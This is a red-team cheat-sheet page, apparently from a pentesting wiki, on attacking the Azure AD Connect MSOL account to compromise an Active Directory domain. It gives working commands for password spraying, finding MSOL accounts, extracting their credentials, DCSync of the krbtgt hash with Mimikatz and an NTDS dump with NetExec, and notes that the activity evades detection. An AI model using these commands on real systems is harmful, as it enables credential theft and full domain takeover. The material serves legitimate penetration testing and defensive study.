MSOL (Microsoft Online Services) account

Targeting MSOL Accounts to Compromise Internal Networks TevoraTevora

Brute force

GitHub - dafthack/MSOLSpray: A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.GitHub

O365 Bruteforce

Enumerate the PHS account and server where AD Connect is installed.

# PowerView
Get-DomainUser -Identity "MSOL_*" -Domain domain.local

# AD module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server domain.local -Properties * | select SamAccountName,Description | fl

Extract MSOL credentials

Administrative privileges needed

@_xpn_ - Azure AD Connect for Red TeamersXPN InfoSec Blog

.\adconnect.ps1

With the password

runas /user:domain.local\MSOL_16fb75d0227d /netonly cmd

DCSync

Because AD Connect synchronizes hashes every two minutes, in an Enterprise Environment, the MSOL_ account will be excluded from tools like MDI. This will allow us to run DCSync without any alerts. 🥳

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local"'

DCSync

NXC

nxc ldap [IP] -u username -p password -M entra-id

Get MSOL Credentials

nxc smb 10.0.0.8 -u admin01 -p '<-SNIP->' --local-auth -M msol

MSOL account can perform a DCSync because the MSOL account has the Replicate Directory Changes All permissions

nxc smb 10.0.0.4  -u MSOL_80541c18ebaa -p '<-SNIP->' --ntds

LeHack 2024 - NetExec workshop writeuprayanlecat blog

PreviousAzure AD / Entra ID NextSCOM credentials

Last updated 6 months ago

hashtagBrute force

hashtagEnumerate the PHS account and server where AD Connect is installed.

hashtagExtract MSOL credentials

hashtagDCSync

hashtagNXC

Brute force

Enumerate the PHS account and server where AD Connect is installed.

Extract MSOL credentials

DCSync

NXC